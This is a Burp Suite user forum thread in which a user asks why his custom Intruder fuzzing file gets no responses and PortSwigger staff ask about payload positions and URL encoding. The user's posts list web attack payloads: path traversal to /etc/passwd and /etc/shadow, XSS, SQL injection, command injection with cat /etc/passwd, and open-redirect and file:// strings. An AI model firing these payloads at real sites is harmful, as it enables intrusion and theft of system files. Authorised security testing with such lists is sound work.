Burp Suite User Forum

Login to post

file for FUZZ

olek | Last updated: Sep 07, 2022 06:16PM UTC

hi Team I would like trivial question for you.I create file for burp FUZZ .But I see server usually not respond .What I doing wrong .Normal file from GithHub works well.Why this my file do not works well during I Fuzz website .This is coding issue or what.????. I just open notepad put payload into.And put for Burp Intruder.But not works ??? Why .?? do=uname-v ?func=ls ?arg=mc /\([^)]*\)|[\n\t]/g ?options=';alert(1)// ?load=hostname ..%2F..%2F/..;~x ?..%2F..%2F/..;~x ?menu=SELECT * FROM users WHERE id='1' OR 1=1-- ?uri=http://bing.com ?path=http://bing.com ?continue=http://bing.com ?url=http://bing.com ?site=../../../../../../../../../etc/passwd ?type=../../../../../../../../../etc/passwd

Hannah, PortSwigger Agent | Last updated: Sep 08, 2022 10:00AM UTC

Hi Olek Could you tell me the version of Burp you are using? Is your file a ".txt" file, or is it in a different format?

olek | Last updated: Sep 08, 2022 12:21PM UTC

This happen on all Burp Version .The format is normally txt .

Ben, PortSwigger Agent | Last updated: Sep 09, 2022 08:36AM UTC

Hi, Just to clarify the situation, the issue that you are facing is that the Intruder attack is running but the payloads that you are inserting are not generating a response from the target site? Or is it the case that the responses being received are not what you are expecting? Are you also able to answer the following: What site are you trying to use the payloads on? What request are you using as the base to carry out the attack? What payload positions having you configured within this request? Finally, what GitHub file are you using that works for you (and are you using the payloads in the GitHub file in exactly the same way as you are with your custom payloads i.e. same base request, same payload positions etc)?

olek | Last updated: Sep 09, 2022 01:58PM UTC

The server do not respond .I see """Error is mark"" .No respond from server.This happened from all websites. 1.From all website situation is the same 2.Just put respond to intruder mark some /x put payload and run. 3.I show you some sample above. The are hundred websites where you can get payload for example https://github.com/danielmiessler/SecLists I see this payload has different structure .One by one but there are some with list as me payload. for example SecLists /.../.../.../.../.../ \…..\\\…..\\\…..\\\ %00../../../../../../etc/passwd %00/etc/passwd%00 %00../../../../../../etc/shadow %00/etc/shadow%00 %0a/bin/cat%20/etc/passwd %0a/bin/cat%20/etc/shadow /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini /../../../../../../../../%2A /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow ..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed ..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd ..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow =3D “/..” . “%2f.. ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini admin/access_log /admin/install.php My payload is like that ================================== ================================== ?list_type="><script>alert(1)</script> ?url="",})</script><svg+onload=confirm(location)> ?terms=%22%22,})%3C/script%3E%3Csvg+onload=confirm(location)%3E ?categoryid="",})</script><svg+onload=confirm(location)> ?key="><script>alert(1)</script> ?l="><script>alert(1)</script> ?begindate="><script>alert(1)</script> ?enddate="><script>alert(1)</script> ?url=file:///etc/passwd?/../passwd ?file:${br}/et${u}c/pas${te}swd?/ ?file:///etc//passwd?#blahblahblah php?id="><img src=x onerror=alert(1)>263 ?login.asp::$DATA ?C:\Progra-1 ?calendar.aspx::$DATA ?login.aspx::$DATA ?api/geojson?url=file:/etc/passwd ?git/.config .env index.php?cmd=cat%20/etc/passwd ?cmd=cat%20/etc/passwd ?php?id=cat%20/etc/passwd I do not know how to create used question mark "?" or not on the beginning.

Hannah, PortSwigger Agent | Last updated: Sep 12, 2022 09:50AM UTC

Hi When you start your attack and look at the requests generated, are the payloads that you specified present? It looks like the payloads you are using probably want to be inserted on the path of the request, as the "?" signifies a query string in a URL. An example of this would be when using a search function on a website.

olek | Last updated: Sep 12, 2022 01:09PM UTC

Hannah I see in community edition work now well.But in suite professional when I load file to intruder form file do not works .But when I copy and paste this works server respond me .This is very strange. Hannah I should mark or not when intruder works option "Url-encode these characters" this have to be mark or not.???

olek | Last updated: Sep 12, 2022 01:14PM UTC

Hannah which version is correct path. ?url=http://bing.com url=http://bing.com /?url=http://bing.com /url=http://bing.com

Hannah, PortSwigger Agent | Last updated: Sep 13, 2022 08:40AM UTC

Hi Could you drop us an email at support@portswigger.net with some screenshots of your options in Community versus Professional? Could you also attach your diagnostics information (Help > Diagnostics) for your installation of Burp Suite Professional?

olek | Last updated: Sep 13, 2022 01:25PM UTC

Yes but I do not have license.Actually I'm unemployed person and I do not have enough money.I won some in bug-bounty but only 50$ when I win some I will buy license.

Hannah, PortSwigger Agent | Last updated: Sep 14, 2022 12:15PM UTC

Hi Our support service is free to all users of Burp, whether you use Community edition or have a license for Burp Suite Pro. If you're using Community Edition and you're finding that Intruder is too slow when using one thread, you can always check out the BApp Store extension "Turbo Intruder".

olek | Last updated: Sep 15, 2022 03:06PM UTC

Hannah which version is correct path. ?url=http://bing.com url=http://bing.com /?url=http://bing.com /url=http://bing.com

Hannah, PortSwigger Agent | Last updated: Sep 16, 2022 03:22PM UTC

Hi Olek That will depend on where your insertion point is.

olek | Last updated: Sep 17, 2022 12:20PM UTC

Hannah last question I should mark or not when intruder works option "Url-encode these characters" this have to be mark or not.???

Hannah, PortSwigger Agent | Last updated: Sep 20, 2022 09:58AM UTC

Hi Olek Unfortunately, again, this would depend on where your insertion point is or what the expected input is.

You need to Log in to post a reply. Or register here, for free.